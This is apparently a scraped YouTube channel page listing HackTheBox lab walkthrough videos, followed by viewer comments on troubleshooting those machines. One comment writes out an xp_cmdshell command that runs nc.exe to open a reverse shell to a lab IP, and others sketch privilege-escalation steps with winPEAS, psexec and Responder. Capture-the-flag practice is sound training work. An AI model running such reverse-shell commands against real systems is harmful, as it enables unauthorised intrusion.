HackTheBox Walkthrough - Vaccine
42:08
HackTheBox Walkthrough // Three
37:08
Hack The Box Walkthrough // Redeemer
16:28
What is Cross Site Scripting? (XSS)
12:19
HackTheBox Walkthrough - Unified
59:07
HackTheBox Walkthrough - Archetype
30:00
Hack The Box Walkthrough - Crocodile
16:40
Hack The Box Walkthrough - Sequel
10:02
Hack The Box Walkthrough - Dancing
10:11
HackTheBox Walkthrough - Fawn
11:38
3 жыл бұрын
HackTheBox Walkthrough - Meow
12:42
3 жыл бұрын
Пікірлер
@shawnstafford9664
@shawnstafford9664 5 күн бұрын
So it's cool and all that you show the nc.exe etc.. and you helped when I was a beginner but you can enter with mssqlclient and use xp shell to grab user.txt with powershell and type. Then wget winPEAS run it like you say ./program and then grab that file and login using psexec. Only upload winPeas 😊 thanks for all the help.
@Photoemulator
@Photoemulator 13 күн бұрын
I hate to be "that guy" but could you reply to me with the new Notion repository? Your link in the description is bad.
@honeybadger-w8z
@honeybadger-w8z 18 күн бұрын
thank you bru
@Beewatuwannabee
@Beewatuwannabee 22 күн бұрын
I miss this guy. one of the great cyber teacher
@JonahReidJessar
@JonahReidJessar 28 күн бұрын
Please don't worry about the video being long! If some people find it too long then they can watch it at 2x speed. For me, it's great to see the explanations and tidbits you have for WHY certain tags or functions are used. I did not skip any of this video!
@JonahReidJessar
@JonahReidJessar 28 күн бұрын
Mere moments before you Ctrl+C-ed your reverse shell, I did the same. I immediately wondered how often it happens when people are copy-and-pasting between VMs and notepads 😀
@honeybadger-w8z
@honeybadger-w8z Ай бұрын
tkhank you bru <3
@DeonDatDeal
@DeonDatDeal Ай бұрын
does anybody know why my winpeas is not returning the ConsoleHost_history.txt file as a finding??? I can manually navigate to the file from powershell so I know its there but I thought it should appear as a critical finding in winpeas. im running the winpeasx64.exe on the target machine.
@harshnegi200
@harshnegi200 Ай бұрын
Thanks..!
@rabinbeka
@rabinbeka Ай бұрын
Great videos. Thank you. I am preparing for the OSCP exam, and I found getting the user flag on this machine way harder than the root flag. The root flag can be obtained by exploiting the "lxd" group. Love the channel. Thank you brother and keep it up
@AFROTECHWORLD-360
@AFROTECHWORLD-360 Ай бұрын
When enter telnet open command am not getting the HTB. Image whyy
@dimchiquee
@dimchiquee 2 ай бұрын
good video, mate you're explaining it really clearly, thank you
@Henners
@Henners 2 ай бұрын
thank you.
@АндрійКайтанюк-н8о
@АндрійКайтанюк-н8о 2 ай бұрын
30:30 idk why, at the moment i connect to postgres@vaccine and try to do something, just in a minute or so i get kicked. terminal writes "exit" itself and i just dont know what to do with it
@XtecherPY
@XtecherPY 3 ай бұрын
why did bro just drop off the face of the earth
@williamogawa1170
@williamogawa1170 3 ай бұрын
10/10 guide, good explanation and extremely easy to understand after the vid. Thank you, true lifesaver
@twoBitSoda
@twoBitSoda 3 ай бұрын
This is an awesome tutorial! But my netcat can't pick up the command, I can't figure out the issue :(
@deadsoul9403
@deadsoul9403 3 ай бұрын
hi i have been struggling on the nc- lvnp i cant get any respone plz help me out
@maxime_vhw
@maxime_vhw 4 ай бұрын
🥲 I got stuck on the username.... So in the file on smb it says: ARCHETYPE\sql_svc But for impacket it needs to be a forward slash: ARCHETYPE/sql_svc
@Fernando-kd6ks
@Fernando-kd6ks 5 ай бұрын
when ever i run xp_cmdshell "powershell -c cd C:\Users\ssql_svc\Downloads; . c.exe -e cmd.exe 10.10.14.45 4444" the nc stays the same nothing happends
@D3W41T3
@D3W41T3 5 ай бұрын
have you thought about teaching this stuff to a class you would be really good at this
@potaeize
@potaeize 5 ай бұрын
Thank you so much
@potaeize
@potaeize 5 ай бұрын
Thank you so much, This is awesome class.
@scwgBeats
@scwgBeats 6 ай бұрын
hey quick question: why is the hash of the administrator even sent? isnt it just the client who recieves a challenge and sends back the hash? thanks if anybody can help me
@scwgBeats
@scwgBeats 6 ай бұрын
ok nvm i got it (the webserver is client in this case) 1. the webserver is the one that sends the request 2. my VM sends the challenge 3. the webserver encrypts the challenge with its password and sends it back to my VM 4. responder + john
@pudzy8441
@pudzy8441 6 ай бұрын
i get an error wheb trying to connect with myswl , please help ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
@mohamedsaifudeen
@mohamedsaifudeen 5 ай бұрын
Bro did you resolve that problem
@alessioferro5659
@alessioferro5659 2 ай бұрын
use --skip_ssl at the end of your command
@2pac1411
@2pac1411 28 күн бұрын
@@alessioferro5659 thanks a bunch! although i did misstype it as --skip-ssl and it still worked
@takacsrekaanna
@takacsrekaanna 7 ай бұрын
39:02 how do i know which port is the reverse shell if 9001 does not work?
@assemmerzoug1
@assemmerzoug1 6 ай бұрын
did u solve it ? same problem here
@takacsrekaanna
@takacsrekaanna 6 ай бұрын
@@assemmerzoug1 yes i did since then! when you do a reverse shell code you specify the port that you will be listening on with netcat so it’s literally whatever as long as the port in the code and the nc listener matches however it still didn’t seem to work with me so i deleted the whole vm and made another with virtualbox and then i got the shell hope this helped!:-)
@makeupxmaddiee3728
@makeupxmaddiee3728 8 ай бұрын
Can you explain using the ' and # after admin? I got a little confused with your wording for what those two do.
@hjaldrgegnir
@hjaldrgegnir 8 ай бұрын
Awesome walkthrough, hope to see more of your videos in the future aswell!
@BetterThanYesterdayMindset
@BetterThanYesterdayMindset 8 ай бұрын
w video fr , helped me so much
@mariojules1814
@mariojules1814 9 ай бұрын
Thank you i was ready to give up untill i saw your tutorial.
@Kevindavegan
@Kevindavegan 9 ай бұрын
I didn't get the flag.
@jorbert87
@jorbert87 9 ай бұрын
firefox won't let me acces to the first [ip]:8443, I'm stuck at the beggining because some security issue
@denizjeminaj1847
@denizjeminaj1847 9 ай бұрын
same issue
@jarvis32aj
@jarvis32aj 9 ай бұрын
Awesome walk through, thank you for this. You did a great job of breaking down the "why" that a lot of others might take for granted or skip over, it's greatly appreciated.
@freem4nn129
@freem4nn129 9 ай бұрын
for the people who are slightly lazy : alias ls='eza -a --color=always --group-directories-first --icons' #my preferred listing alias la='eza -a --color=always --group-directories-first --icons' # all files and dirs alias ll='eza -l --color=always --group-directories-first --icons' # long format alias lt='eza -aT --color=always --group-directories-first --icons' # tree listing alias l.='eza -a --icons | egrep "^\."'
@johnripper6828
@johnripper6828 10 ай бұрын
When I open a new tab, the contents and processes of previous tab are appearing in the new tab as well. When I enter ctrl+c, the entire process is shutting down. How to solve this issue?
@tone_loc
@tone_loc 10 ай бұрын
Great walkthrough! thank you! subscribed!
@KevinJohn556
@KevinJohn556 10 ай бұрын
Your awesome. Your guides are helping me understand so MUCH MORE! I am half way through my google classes and this is well past what I’m doing right now so I’m getting lost easily. It’s so much easier listening to you than following their write ups.
@Zadok77
@Zadok77 10 ай бұрын
Great teacher ! thanks so much for your easy to follow explanations and overall great content ! cant wait to see more videos.
@lucmarrouche71
@lucmarrouche71 10 ай бұрын
I love this guy, great teacher, well spoken, knowledgeable and takes the time to explain things in details
@informatik4lehrplan216
@informatik4lehrplan216 10 ай бұрын
thanks a lot, very good explained with background informations.
@stefanvoigt6983
@stefanvoigt6983 10 ай бұрын
Also youre kind of a Chad for all those Anime Posters in the background, I still feel a little immature when I pull up to the Office with my zoro-cup 😅😅
@josephodoherty8049
@josephodoherty8049 10 ай бұрын
Started my OSCP learning journey, this video was extremely helpful, you thank you!
@Macj707
@Macj707 11 ай бұрын
CHEF CRISP WUZ HERE!
@stefanvoigt6983
@stefanvoigt6983 11 ай бұрын
Youre such a great teacher, so easy to absorb and such a great teaching style, please dont waste that talent, not many can do it like you. I know these Videos aren't a gold mine in terms of revenue but if you had an ounce of fun making these we'd love to see more
@josiahbleeker9858
@josiahbleeker9858 11 ай бұрын
I tried uploading a new user with my hash, it stopped working, then i exited the shell and everything was down. Server host unreachable :/
@jamesk400
@jamesk400 11 ай бұрын
the walkthrough that HTB provided didn't get me the answer, your explanation got me to the flag, thank you
@vincesparacello3692
@vincesparacello3692 11 ай бұрын
5 stars out of 5. Great videos, man. Love it
@KiyoshiNoshi
@KiyoshiNoshi 11 ай бұрын
after i did the ling the 64 bytes from (ip) wont stop
@martinlastname8548
@martinlastname8548 11 ай бұрын
Great Video. Good attention to detail
11 ай бұрын
how dou know that downloads is the correct directory?